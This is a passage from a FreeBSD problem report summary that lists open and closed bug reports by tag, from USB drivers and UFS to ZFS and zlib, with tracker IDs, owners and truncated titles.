usb/77294 usb [ucom] [panic] ucom + ulpcom panic o usb/75800 usb [ucom] ucom1: init failed STALLED error in time of syn s usb/72733 usb [ucom] [request] Kyocera 7135 Palm OS connection probl o usb/66547 usb [ucom] Palm Tungsten T USB does not initialize correct 13 problems total. Problem reports for tag 'udav': S Tracker Resp. Description -------------------------------------------------------------------------------- s usb/80776 usb [udav] [request] UDAV device driver shouldn't use usb_ 1 problem total. Problem reports for tag 'udbp': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/122813 usb [udbp] [request] udbp driver should be removed in favo o usb/82520 usb [udbp] [reboot] Reboot when USL101 connected 2 problems total. Problem reports for tag 'udf': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/120989 scottl [udf] [patch] UDF (with DVD RAM) isn't mountable/reada o kern/60089 scottl [udf] UDF filesystem appends garbage to files 2 problems total. Problem reports for tag 'udp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133736 net [udp] ip_id not protected ... o kern/127057 net [udp] Unable to send UDP packet via IPv6 socket to IPv o kern/120266 net [udp] [panic] gnugk causes kernel panic when closing U o kern/112722 net [ipsec] [udp] IP v4 udp fragmented packet reject 4 problems total. Problem reports for tag 'ufs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135469 fs [ufs] [panic] kernel crash on md operation in ufs_dirb o kern/132960 fs [ufs] [panic] panic:ffs_blkfree: freeing free frag o kern/132331 fs [ufs] [lor] LOR ufs and syncer o kern/129231 fs [ufs] [patch] New UFS mount (norandom) option - mostly o kern/126287 fs [ufs] [panic] Kernel panics while mounting an UFS file a kern/125613 rwatson [ufs] [patch] ACL problems with special files o bin/121779 fs [ufs] snapinfo(8) (and related tools?) only work for t o kern/117954 [ufs] dirhash on very large directories blocks the mac o kern/114676 fs [ufs] snapshot creation panics: snapacct_ufs2: bad blo o kern/111782 fs [ufs] dump(8) fails horribly for large filesystems o kern/106030 fs [ufs] [panic] panic in ufs from geom when a dead disk o kern/104406 fs [ufs] Processes get stuck in "ufs" state under persist o kern/94849 fs [ufs] rename on UFS filesystem is not atomic o kern/94769 fs [ufs] Multiple file deletions on multi-snapshotted fil f kern/91568 fs [ufs] [panic] writing to UFS/softupdates DVD media in o kern/89991 fs [ufs] softupdates with mount -ur causes fs UNREFS o bin/73019 fs [ufs] fsck_ufs(8) cannot alloc 607016868 bytes for ino o kern/68978 fs [panic] [ufs] crashes with failing hard disk, loose po o kern/58373 mckusick [ufs] ufs inconsistency between 4.9-RC and 5.1 o kern/48393 mckusick [ufs] ufs2 snapshot code bugs 20 problems total. Problem reports for tag 'uftdi': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/129758 usb [uftdi] [patch] add Pyramid LCD usb support o usb/121045 usb [uftdi] [patch] Add support for PC-OP-RS1 and KURO-RS o usb/117546 remko [uftdi] [patch] Add MaxStream ZigBee product ID to uft o usb/115933 usb [uftdi] [patch] RATOC REX-USB60F (usb serial converter o usb/106615 usb [uftdi] uftdi module does not automatically load with o usb/67301 usb [uftdi] [panic] RTS and system panic 6 problems total. Problem reports for tag 'ugen': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/126884 usb [ugen] [patch] Bug in buffer handling in ugen.c o usb/121734 usb [ugen] ugen HP1022 printer device not working since up o usb/117200 usb [ugen] ugen0 prints strange string on attach if detach o usb/110856 usb [ugen] [patch] interrupt in msgs are truncated when bu o usb/83863 usb [ugen] Communication problem between opensc/openct via o usb/81308 imp [ugen] [patch] [2] polling a ugen(4) control endpoint o usb/71417 usb [ugen] Cryptoflex e-gate USB token (ugen0) communicati o usb/71416 usb [ugen] Cryptoflex e-gate USB token (ugen0) detach is n o usb/68232 usb [ugen] [patch] ugen(4) isochronous handling correction 9 problems total. Problem reports for tag 'uhci': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/129673 usb [uhci] uhci (uhub) confused on replugging USB 1.1 scan o usb/117613 usb [uhci] [irq] uhci interrupt storm & USB leaked memory o usb/79287 usb [uhci] [hang] UHCI hang after interrupt transfer o usb/76395 usb [uhci] USB printer does not work, usbdevs says "addr 0 4 problems total. Problem reports for tag 'uhid': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/111753 usb [uhid] [panic] Replicable system panic involving UHID f usb/63837 linimon [uhid] [patch] USB: hid_is_collection() only looks for 2 problems total. Problem reports for tag 'uhub': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/107496 usb [uhub] USB device problem on RELENG_6_2 (SHORT_XFER) [ o usb/103917 usb [uhub] USB driver reports "Addr 0 should never happen" o usb/103025 usb [uhub] [panic] wrong detection of USB device for FreeB o usb/92142 usb [uhub] SET_ADDR_FAILED and SHORT_XFER errors from usb 4 problems total. Problem reports for tag 'uipaq': S Tracker Resp. Description -------------------------------------------------------------------------------- p usb/121184 usb [uipaq] [patch] add ids from linux ipaq driver (plus a 1 problem total. Problem reports for tag 'ukbd': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/133989 usb [newusb] [ukbd] USB keyboard dead at mountroot> prompt o usb/132066 usb [ukbd] Keyboard failure USB keyboard DELL 760 f kern/131798 gavin [ukbd] usb keyboard doesn't work with motherboard inte o usb/125736 usb [ukbd] [hang] system hangs after AT keyboard detect if o usb/116947 usb [ukbd] [patch] [regression] enable boot protocol on th s usb/113629 usb [ukbd] Dropped USB keyboard events on Dell Latitude D6 o usb/102066 usb [ukbd] usb keyboard and multimedia keys don't work 7 problems total. Problem reports for tag 'ulpt': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/126740 usb [ulpt] doesn't work on 7.0-RELEASE, 10 second stall be o usb/122483 usb [panic] [ulpt] Repeatable panic in 7.0-STABLE o usb/116282 usb [ulpt] Cannot print on USB HP LJ1018 or LJ1300 o usb/115298 usb [ulpt] [panic] Turning off USB printer panics kernel o usb/112944 usb [ulpt] [patch] Bi-directional access to HP LaserJet 10 o usb/103046 usb [ulpt] [patch] ulpt event driven I/O with select(2) an o usb/94717 usb [ulpt] Reading from /dev/ulpt can break work of a UHCI o usb/93155 usb [ulpt] /dev/ulpt0: device busy, USB printer does not w o usb/92052 usb [ulpt] usbd causes defunct process with busy file-hand o usb/91538 usb [ulpt] [patch] Unable to print to EPSON CX3500 o usb/79524 usb [ulpt] printing to Minolta PagePro 1[23]xxW via USB fa o usb/71155 usb [ulpt] misbehaving usb-printer hangs processes, causes 12 problems total. Problem reports for tag 'uma': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/85971 jeff [uma] [patch] minor optimization to uma 1 problem total. Problem reports for tag 'umapfs': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/74708 [umapfs] [panic] UMAPFS kernel panic 1 problem total. Problem reports for tag 'umass': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/135628 remko [umass] [patch] add a device quirk for Myson Heden 881 o usb/135348 usb [umass] USB Drive Hangs with ZFS (JMicron USB2/eSata) o usb/134476 usb [usb2] [umass] [quirk] Add quirk for Cypress xx6830xx o usb/134085 usb [umass] Adding usb quirk for Sony USB flash drive o usb/131583 usb [umass] Failure when detaching umass Device o usb/129500 usb [umass] [panic] FreeBSD Crashes when connecting SanDis o usb/128425 usb [umass] Cannot Connect Maxtor Onetouch 4 USB drive o usb/127980 usb [umass] [patch] Fix Samsung YP U2 MP3 player on 7.x an s usb/127549 usb [umass] [patch] Meizu MiniPlayer M6 (SL) requires some f kern/125985 [umass] [panic] no da-device, panic upon unplugging o usb/123509 usb [umass] continuous reset Samsung SGH-G600 phone f usb/123508 vwe [umass] [msdosfs] damaged files (mp3,txt , etc) on fla o usb/122992 usb [umass] [patch] MotoROKR Z6 Phone not recognised by um o usb/122119 usb [umass] umass device causes creation of daX but not da o usb/121169 usb [umass] Issues with usb mp3 player o usb/120572 usb [umass] [patch] quirk to support ASUS P535 as umass (a o usb/119633 usb [umass] umass0: BBB reset failed, IOERROR [regression] o usb/119389 usb [umass] Sony DSC-W1 CBI reset failed, STALLED [regress o usb/118480 usb [umass] Timeout in USB mass storage freezes vfs layer o usb/118098 usb [umass] 6th gen iPod causes problems when disconnectin o usb/117955 usb [umass] [panic] inserting minolta dimage a2 crashes OS o usb/117893 usb [umass] Lacie USB DVD writing failing o usb/117313 usb [umass] [panic] panic on usb camera insertion o usb/114916 usb [umass] [patch] USB Maxtor drive (L300RO) requires qui o usb/114682 usb [umass] generic USB media-card reader unusable o kern/114667 [umass] UMASS device error log problem o usb/114068 usb [umass] [patch] Problems with connection of the umass s usb/112568 usb [umass] [request] USB mode may wrong when mounting Pla o usb/112463 usb [umass] problem with Samsung USB DVD writer, libscg an o usb/110197 usb [umass] Sony PSP umass device does not detach from EHC o usb/108513 usb [umass] Creative MuVo TX FM fails in 6.2-RELEASE [regr o usb/107848 usb [umass] [request] cannot access Samsung flash disk o usb/107248 usb [umass] [patch] scsi_da.c quirk for Cowon iAUDIO X5 MP o usb/106648 usb [umass] [hang] USB Floppy on D1950 10 min Hang on Inse o usb/104830 usb [umass] system crashes when copying data to umass devi o usb/104645 usb [umass] [request] Rave C-201 MP3 player does not commu o usb/104292 usb [umass] [hang] system lockup on forced umount of usb-s o usb/104290 usb [umass] [patch] quirk: TOSHIBA DVD-RAM drive (libretto o usb/101752 usb [umass] [panic] 6.1-RELEASE kernel panic on usb device o usb/97175 usb [umass] [hang] USB cardreader hangs system o usb/96457 usb [umass] [panic] fatback on umass = reboot s usb/95636 usb [umass] [boot] 5 minute delay at boot when using VT620 o usb/95562 usb [umass] Write Stress in USB Mass drive causes "vinvalb o usb/95037 usb [umass] USB disk not recognized on hot-plug. o usb/93389 usb [umass] [patch] Digital Camera Pentax S60 don't work o usb/91811 usb [umass] Compact Flash in HP Photosmart 2610 return " o usb/91238 usb [umass] USB tape unit fails to write a second tape fil o usb/90700 usb [umass] [panic] Kernel panic on connect/mount/use umas o usb/89954 usb [umass] [panic] USB Disk driver race condition? o usb/86767 usb [umass] [patch] bogus "slice starts beyond end of the o usb/84326 usb [umass] Panic trying to connect SCSI tape drive via US o usb/83563 usb [umass] [panic] Page Fault while detaching Mpman Usb d s usb/82569 usb [umass] [panic] USB mass storage plug/unplug causes sy o usb/80361 usb [umass] [patch] mounting of Dell usb-stick fails o usb/78984 usb [umass] [patch] Creative MUVO umass failure o usb/77184 usb [umass] [panic] kernel panic on USB device disconnect, o usb/76653 usb [umass] [patch] Problem with Asahi Optical usb device o usb/76461 usb [umass] disklabel of umass(4)-CAM(4)-da(4) not used by s usb/75928 usb [umass] [request] Cytronix SmartMedia card (SMC) reade o usb/75764 usb [umass] [patch] "umass0: Phase Error" - no device for o usb/75705 usb [umass] [panic] da0 attach / Optio S4 (with backtrace) o usb/74771 usb [umass] [hang] mounting write-protected umass device a s usb/74453 usb [umass] [patch] Q-lity CD-RW USB ECW-043 (ScanLogic SL o usb/74211 usb [umass] USB flash drive causes CAM status 0x4 on 4.10R o usb/71455 usb [umass] Slow USB umass performance of 5.3 o usb/63621 usb [umass] [panic] USB MemoryStick Reader stalls/crashes s usb/62257 usb [umass] [request] card reader UCR-61S2B is only half-s o usb/40948 usb [umass] [request] USB HP CDW8200 does not work 68 problems total. Problem reports for tag 'umct': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/70523 usb [umct] [patch] umct sending/receiving wrong characters 1 problem total. Problem reports for tag 'umodem': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/128485 usb [umodem] [patch] Nokia N80 modem support p usb/117185 thompsa [umodem] [patch] Add support for UNION interface descr o usb/116561 usb [umodem] [panic] RELENG_6 umodem panic "trying to slee o usb/91546 usb [umodem] [patch] Nokia 6630 mobile phone does not work 4 problems total. Problem reports for tag 'ums': S Tracker Resp. Description -------------------------------------------------------------------------------- p usb/128760 cperciva [ums] [patch] patch for Microsoft Comfort Optical Mous o usb/125631 usb [ums] [panic] kernel panic during bootup while 'Logite o usb/125238 usb [ums] Habu Mouse turns off in X o usb/124604 usb [ums] Microsoft combo wireless mouse doesn't work o usb/119977 usb [ums] Mouse does not work in a Cherry-USB keyboard/mou o usb/117938 usb [ums] [patch] Adding support for MS WL Natural and MS o usb/117911 usb [ums] [request] Mouse Gembird MUSWC not work o kern/103578 [ums] ums does not recognize mouse buttons s usb/96120 usb [ums] [request] USB mouse not always detected o usb/92852 usb [ums] [patch] Vertical scroll not working properly on o usb/83756 usb [ums] [patch] Microsoft Intellimouse Explorer 4.0A doe o usb/76732 usb [ums] Mouse problems with USB KVM Switch o kern/56250 [ums] [patch] ums(4) doesn't work with MCT based PS/2 13 problems total. Problem reports for tag 'unionfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132987 daichi [unionfs] unionfs_readdir has math problem o kern/126973 daichi [unionfs] [hang] System hang with unionfs and init chr o kern/126553 daichi [unionfs] unionfs move directory problem 2 (files appe o bin/123574 daichi [unionfs] df(1) -t option destroys info for unionfs (a o kern/121385 daichi [unionfs] unionfs cross mount -> kernel panic o kern/109377 daichi [unionfs] unionfs crashes if underlying file system fo 6 problems total. Problem reports for tag 'uplcom': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/129173 usb [uplcom] [patch] Add support for Corega CG-USBRS232R a o usb/128324 usb [uplcom] [patch] remove baud rate restriction for PL23 f usb/115737 linimon [uplcom] uplcom doesn't identify my Prolific 2303 any o kern/114780 usb [uplcom] [panic] Panics while stress testing the uplco o usb/107935 usb [uplcom] [panic] panic while accessing /dev/cuaU0 o kern/95512 [uplcom] uplcom(4) causes system hangups 6 problems total. Problem reports for tag 'ural': S Tracker Resp. Description -------------------------------------------------------------------------------- f usb/133712 gavin [ural] [patch] RE: Fixed an issue with ural(4) that wa o usb/104352 usb [ural] [patch] ural driver doesnt work o usb/101096 usb [ural] [panic] USB WLAN occasionally causes kernel-pan o usb/92083 usb [ural] [panic] panic using WPA on ural NIC in 6.0-RELE o kern/88182 [ural] [wep] wep is broken in ural(4) hostap mode 5 problems total. Problem reports for tag 'urio': S Tracker Resp. Description -------------------------------------------------------------------------------- s usb/51958 usb [urio] [patch] update for urio driver 1 problem total. Problem reports for tag 'usb': S Tracker Resp. Description -------------------------------------------------------------------------------- f usb/133545 usb [usb] [panic] Kernel crash in usb2_intr_schedule_adjus p usb/132799 usb [usb][patch]GENESYS USB2IDE requires NO_SYNCHRONIZE_CA o usb/132785 usb [usb] [patch] Gemtech remote powersocket is classed as o usb/132080 usb [patch] [usb] Kernel panic after NOMEM caused by rum c o usb/130325 usb [usb] [patch] fix tools/tools/usb/print-usb-if-vids.sh p usb/129858 remko [usb] [patch] Need to add quirk to da_scsi.c to suppor o usb/129766 usb [usb] plugging in usb modem HUAWEI E226 panics system o usb/129311 usb [usb] [panic] Instant crash with an USB card reader s usb/128990 usb [usb] u3g does not handle RTS/CTS available on for exa o usb/128977 usb [usb] [patch] uaudio is not full duplex f usb/126848 usb [usb]: USB Keyboard hangs during Installation o usb/126519 usb [usb] [panic] panic when plugging in an iphone o kern/124130 geom [gmirror] [usb] gmirror fails to start usb devices tha o usb/123969 usb [usb] Supermicro H8SMi-2 usb problem: port reset faile o usb/123714 usb [usb] [panic] Panic when hald-storage-probe runs with o usb/123690 usb [usb] [panic] Panic on USB device insertion when usb l o usb/123611 usb [usb] BBB reset failed, STALLED from Imation/Mitsumi U o usb/122819 usb [usb] [patch] Patch to provide dynamic additions to th o usb/121232 usb [usb] [panic] USB CardBus card removal causes reboot s o usb/120786 usb [usb] [panic] Kernel panic when forced umount of a det o usb/119509 usb [usb] USB flaky on Dell Optiplex 755 o usb/112640 usb [usb] [hang] Kernel freezes when writing a file to an o usb/109274 usb [usb] MCP55 USB Controller fails to attach in AMD64 Cu s usb/106832 usb [usb] USB HP printer is not detected by kernel when AC o usb/106041 usb [usb] [request] FreeBSD does not recognise Mustek Bear o usb/105065 usb [ata] [usb] SATA - USB Bridge o usb/101761 usb [usb] [patch] [request] usb.h: increase maximal size o o usb/96224 usb [usb] [msdosfs] mount_msdosfs cause page fault in sync o usb/91629 usb [usb] usbd_abort_pipe() may result in infinite loop o usb/87224 usb [usb] Cannot mount USB Zip750 s usb/84336 usb [usb] [reboot] instant system reboot when unmounting a o usb/79723 usb [usb] [request] prepare for high speed isochronous tra s usb/79622 imp [usb] USB devices can be freed twice s usb/52026 usb [usb] [request] umass driver support for InSystem ISD2 o usb/30929 usb [usb] [patch] use usbd to initialize USB ADSL modem 35 problems total. Problem reports for tag 'usb2': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/134476 usb [usb2] [umass] [quirk] Add quirk for Cypress xx6830xx 1 problem total. Problem reports for tag 'usbdevs': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/135575 usb [usbdevs] [patch] Add HTC Wizard phone vid/pid informa o usb/134631 usb [usbdevs] [patch] WiSPY DBx support requires usb tweak o usb/131900 usb [usbdevs] [patch] Additional product identification co o usb/129945 usb [usbdevs] [patch] add u3g support for Longcheer WM66 U o usb/129251 usb [usbdevs] [patch] Liebert UPS being assigned uhid and o usb/128803 usb [usbdevs] [patch] Quirk for I-Tuner Networks USBLCD4X2 o usb/123352 usb [usbdevs] [patch] Add Option GTMAX3.6/7.2 and Quallcom o usb/123351 usb [usbdevs] [patch] Add Reiner SCT cyberJack, Omnikey [2 o usb/119150 remko [usbdevs] [patch] new usbdevs for CDMA 1xEVDO devices o usb/118485 usb [usbdevs] [patch] Logitech Headset Workaround o usb/115935 usb [usbdevs] [patch] kernel counterproductively attaches a usb/113060 usb [usbdevs] [patch] Samsung printer not working in bidir o usb/106861 usb [usbdevs] [patch]: usbdevs update: Add product ACER Ze o usb/69006 usb [usbdevs] [patch] Apple Cinema Display hangs USB ports 14 problems total. Problem reports for tag 'usbhid': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/116699 usb [usbhid] USB HID devices do not initialize at system b 1 problem total. Problem reports for tag 'uscanner': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/122025 usb [uscanner] [patch] uscanner does not attach to Epson R o usb/121426 usb [patch] [uscanner] add HP ScanJet 3570C o usb/117205 remko [uscanner] [patch] uscanner support for HP ScanJet 447 s usb/85067 usb [uscanner] Cannot attach ScanJet 4300C to usb device 4 problems total. Problem reports for tag 'uslcom': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/131912 usb [uslcom] [patch] New devices using Silicon Labs chips 1 problem total. Problem reports for tag 'uvisor': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/80935 usb [uvisor] [patch] uvisor.c is not work with CLIE TH55. 1 problem total. Problem reports for tag 'vesa': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134504 [vesa] thinkpad t60 with ati x1400 in vesa console mod p i386/127367 delphij [vesa] [patch] Improve VESA support for Parallels (pat 2 problems total. Problem reports for tag 'vfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134883 [vfs] [panic] kernel panic, superpages, vfs.lookup_sha o amd64/134786 amd64 [vfs] [patch] vfs.bufspace sysctl wideness on amd64 p kern/133439 kan [vfs] [panic] Kernel Panic in kern_vfs o kern/123392 [vfs] [lor] lock order reversal in vfs o kern/94669 pjd [vfs] [patch] Panic from Failed Removable Media Mount o kern/93942 fs [vfs] [patch] panic: ufs_dirbad: bad dir (patch from D 6 problems total. Problem reports for tag 'vga': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/125710 [vga] Dragon_Saver Error 19 Freebsd 7.0 AMD64 o kern/64114 [vga] [patch] bad vertical refresh for console using R 2 problems total. Problem reports for tag 'vge': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/129135 net [vge] vge driver on a VIA mini-ITX not working o kern/106851 [vge] vge0: MII read timed out [regression] o amd64/87316 amd64 [vge] "vge0 attach returned 6" on FreeBSD 6.0-RC1 amd6 o kern/82497 net [vge] vge(4) on AMD64 only works when loaded late, not f kern/81644 net [vge] vge(4) does not work properly when loaded as a K 5 problems total. Problem reports for tag 'viapm': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/120714 gonzo [viapm] [patch] viapm driver doesn't work on VIA VT823 1 problem total. Problem reports for tag 'vinum': S Tracker Resp. Description -------------------------------------------------------------------------------- a kern/89660 geom [vinum] [patch] [panic] due to g_malloc returning null o kern/79035 geom [vinum] gvinum unable to create a striped set of mirro o conf/47566 [vinum] [patch] add vinum status verification to perio 3 problems total. Problem reports for tag 'virtualbox': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/117681 [virtualbox] pcn fails to send packets under VirtualBo 1 problem total. Problem reports for tag 'virtualpc': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/119809 gavin [virtualpc] MS Virtual PC 2007 - Install hung - Trying 1 problem total. Problem reports for tag 'vlan': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/126874 net [vlan]: Zebra problem if ifconfig vlanX destroy o kern/121437 net [vlan] Routing to layer-2 address does not work on VLA o kern/117423 net [vlan] Duplicate IP on different interfaces 3 problems total. Problem reports for tag 'vm': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133289 [vm] [panic] DEBUG_MEMGUARD with vm.memguard.desc="dev o kern/124963 alc [vm] [patch] old pagezero fixes for alc o kern/123634 [vm] [panic] kernel panic with FreeBSD 7-STABLE o kern/123013 [vm] panic "Bad tailq NEXT(%p->tqh_last) != NULL" s kern/121485 vwe [vm] panic with 7.0-RELEASE [regression] o kern/121234 [vm] vm_fault: fault on nofault o kern/87586 [diskless] [vm] [panic] Unable to use networked swap i p kern/78179 alc [vm] [patch] bus_dmamem_alloc() with BUS_DMA_NOWAIT ca o kern/71258 alc [vm] [patch] anonymous mmappings not always page align o kern/37554 jmg [vm] [patch] make ELF shared libraries immutable once s i386/22944 alc [vm] [patch] isa_dmainit fails on machines with 512MB 11 problems total. Problem reports for tag 'vmware': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/118819 [vmware] FreeBSD 6.2 in VMware is unstable and there i o kern/109809 [vmware] CPU hits 100% when issuing the halt command ( o i386/97025 i386 [vmware] fbsd (2 cd) dont install in vmware 5.5.0 - re 3 problems total. Problem reports for tag 'vr': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/126665 yongari [vr] Integrated VIA Rhine II receive errors p kern/123961 net [vr] [patch] Allow vr interface to handle vlans a kern/109477 yongari [vr] [patch] onboard via vt6103 ethernet does not work s kern/103495 vwe [vr] if_vr locks after carrier event o kern/100499 yongari [vr] vr interface stops transmitting s kern/94390 vwe [vr] poor network performance after promiscuous mode i o kern/90890 net [vr] Problems with network: vr0: tx shutdown timeout s kern/89305 vwe [vr] [patch] D-Link NIC with VIA Rhine II, lost of Net o kern/87506 net [vr] [patch] Fix alias support on vr interfaces s kern/80265 vwe [vr] D-Link NIC with VIA Rhine II has no carrier sign o kern/71045 [rl] [vr] DHCP-Request is sets other device's ip to nu 11 problems total. Problem reports for tag 'vuxml': S Tracker Resp. Description -------------------------------------------------------------------------------- o ports/134785 novel [patch][vuxml] security/gnutls: update to 2.6.6 and do o ports/129300 obrien [vuxml] editors/vim: document CVE-2008-3432 2 problems total. Problem reports for tag 'wi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/131776 net [wi] driver fails to init f kern/127145 net [wi]: prism (wi) driver crash at bigger traffic o kern/122319 net [wi] imposible to enable ad-hoc demo mode with Orinoco o kern/119225 net [wi] 7.0-RC1 no carrier with Prism 2.5 wifi card [regr o kern/115275 [wi] [panic] wi configure at boot time led to panic "i o kern/115002 net [wi] if_wi timeout. failed allocation (busy bit). ifco o kern/110065 [wi]: wi device cannot attach to D-Link DWL-520 rev. E o kern/109470 net [wi] Orinoco Classic Gold PC Card Can't Channel Hop o kern/107944 net [wi] [patch] Forget to unlock mutex-locks s kern/79323 [wi] authmod setup with ifconfig on dlink wlan card fa p kern/77913 net [wi] [patch] Add the APDL-325 WLAN pccard to wi(4) o kern/59183 imp [wi] wi problems with wi_cmd o kern/43625 imp [wi] wi(4) driver hangs after long data transfers o kern/39928 imp [wi] wi0 timeouts and hangs the system while sending d 14 problems total. Problem reports for tag 'wlan': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132885 net [wlan] 802.1x broken after SVN rev 189592 1 problem total. Problem reports for tag 'wlan_xauth': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/130311 net [wlan_xauth] [panic] hostapd restart causing kernel pa 1 problem total. Problem reports for tag 'wpa': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/122331 [wpa] [panic] 7.0-RELEASE && panic in Wifi area with W 1 problem total. Problem reports for tag 'wpi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133613 net [wpi] [panic] kernel panic in wpi(4) o kern/128917 net [wpi] [panic] if_wpi and wpa+tkip causing kernel panic o kern/127102 net [wpi] Intel 3945ABG low throughput o kern/123256 net [wpi] panic: blockable sleep lock with wpi(4) o kern/121872 net [wpi] driver fails to attach on a fujitsu-siemens s711 f kern/121720 thompsa [wpi] wpi doesnt work if kernel has options SCHED_ULE o kern/120493 benjsc [wpi] if_wpi.ko fails to load on a Toshiba Satellite P 7 problems total. Problem reports for tag 'xe': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/97401 [xe] Xircom CreditCard Ethernet 10/100, attach returne o kern/85266 net [xe] [patch] xe(4) driver does not recognise Xircom XE 2 problems total. Problem reports for tag 'xen': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135421 xen [xen] FreeBSD Xen PVM DomU network failure - netfronc. o kern/135179 xen [xen] Xen domU does not properly reboot o kern/135178 xen [xen] Xen domU outgoing data transfer stall when TSO i o kern/135069 xen [xen] FreeBSD-current/Xen SMP doesn't function at all o kern/135008 xen [xen] FreeBSD-current/Xen timecounter jumps o kern/134926 xen [xen] [panic] FreeBSD-current Xen DomU networking pani o i386/124516 kmacy [xen] FreeBSD-CURRENT Xen Kernel Segfaults when config o kern/118734 [xen] FreeBSD 6.3-RC1 and FreeBSD 7.0-BETA 4 fail to b 8 problems total. Problem reports for tag 'xfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/119298 kan [xfs] [patch] 7-Stable/sys/modules/xfs fails to make f o kern/102943 kan [xfs] kernel crash when unloading the xfs kernel modul 2 problems total. Problem reports for tag 'xl': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132669 net [xl] 3c905-TX send DUP! in reply on ping (sometime) o kern/129352 net [xl] [patch] xl0 watchdog timeout o kern/113895 net [xl] xl0 fails on 6.2-RELEASE but worked fine on 5.5-R o kern/83354 [xl] When two 3c905's are in a Vectra Vl dhcp fails to s kern/18558 silby [xl] 3COM 905B realy realy slow when using multiple ad 5 problems total. Problem reports for tag 'zfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135594 fs [zfs] Single dataset unresponsive with Samba o kern/135546 fs [zfs] zfs.ko module doesn't ignore zpool.cache filenam o kern/135480 fs [zfs] panic: lock &arg.lock already initialized o kern/135412 fs [zfs] [nfs] zfs(v13)+nfs and open(..., O_WRONLY|O_CREA o bin/135314 fs [zfs] assertion failed for zdb(8) usage o kern/135050 fs [zfs] ZFS clears/hides disk errors on reboot o kern/135039 fs [zfs] mkstemp() fails over NFS when server uses ZFS (7 f kern/134496 fs [zfs] [panic] ZFS pool export occasionally causes a ke o kern/134491 fs [zfs] Hot spares are rather cold... o kern/133373 fs [zfs] umass attachment causes ZFS checksum errors, dat f kern/133150 fs [zfs] Page fault with ZFS on 7.1-RELEASE/amd64 while w o kern/133134 fs [zfs] Missing ZFS zpool labels f kern/133020 fs [zfs] [panic] inappropriate panic caused by zfs. Pani o kern/132551 fs [zfs] ZFS locks up on extattr_list_link syscall o kern/132337 fs [zfs] [panic] kernel panic in zfs_fuid_create_cred f kern/132068 fs [zfs] page fault when using ZFS over NFS on 7.1-RELEAS f kern/130133 kmacy [panic] [zfs] 'kmem_map too small' caused by make clea o kern/129148 fs [zfs] [panic] panic on concurrent writing & rollback o kern/129059 fs [zfs] [patch] ZFS bootloader whitelistable via WITHOUT o kern/128633 fs [zfs] [lor] lock order reversal in zfs o kern/128514 fs [zfs] [mpt] problems with ZFS and LSILogic SAS/SATA Ad o kern/127492 fs [zfs] System hang on ZFS input-output f kern/127375 kmacy [zfs] If vm.kmem_size_max>"1073741823" then write spee f kern/126703 kmacy [panic] [zfs] _mtx_lock_sleep: recursed on non-recursi s kern/125738 fs [zfs] [request] SHA256 acceleration in ZFS o kern/125644 fs [zfs] [panic] zfs unfixable fs errors caused panic whe f kern/125413 kmacy [zfs] [panic] Panic when doing zfs raidz with gmirror f kern/125358 linimon [zfs] missing .. link in zfs snapshot f bin/124424 fs [zfs] zfs(8): zfs list -r shows strange snapshots' siz f sparc/123566 kmacy [zfs] zpool import issue: EOVERFLOW o kern/122888 fs [zfs] zfs hang w/ prefetch on, zil off while running t o kern/122173 fs [zfs] [panic] Kernel Panic if attempting to replace a o kern/121770 fs [zfs] ZFS on i386, large file or heavy I/O leads to ke o bin/121366 fs [zfs] [patch] Automatic disk scrubbing from periodic(8 o conf/120228 rc [zfs] [patch] Split ZFS volume startup / ease ZFS swap f kern/120210 kmacy [zfs] [panic] reboot after panic: solaris assert: arc_ f kern/119735 fs [zfs] geli + ZFS + samba starting on boot panics 7.0-B o misc/118855 fs [zfs] ZFS-related commands are nonfunctional in fixit o kern/118320 fs [zfs] [patch] NFS SETATTR sometimes fails to set file o kern/117943 kmacy [zfs] zfs snapshot directory could not access from NFS o kern/117158 fs [zfs] zpool scrub causes panic if geli vdevs detach on o bin/115361 fs [zfs] mount(8) gets into a state where it won't set/un o kern/113180 fs [zfs] Setting ZFS nfsshare property does not cause inh 43 problems total. Problem reports for tag 'zlib': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/118317 [zlib] [patch] Incorrect gzeof() return value in zlib o kern/43616 [zlib] [patch] static-ize some functions in sys/net/zl 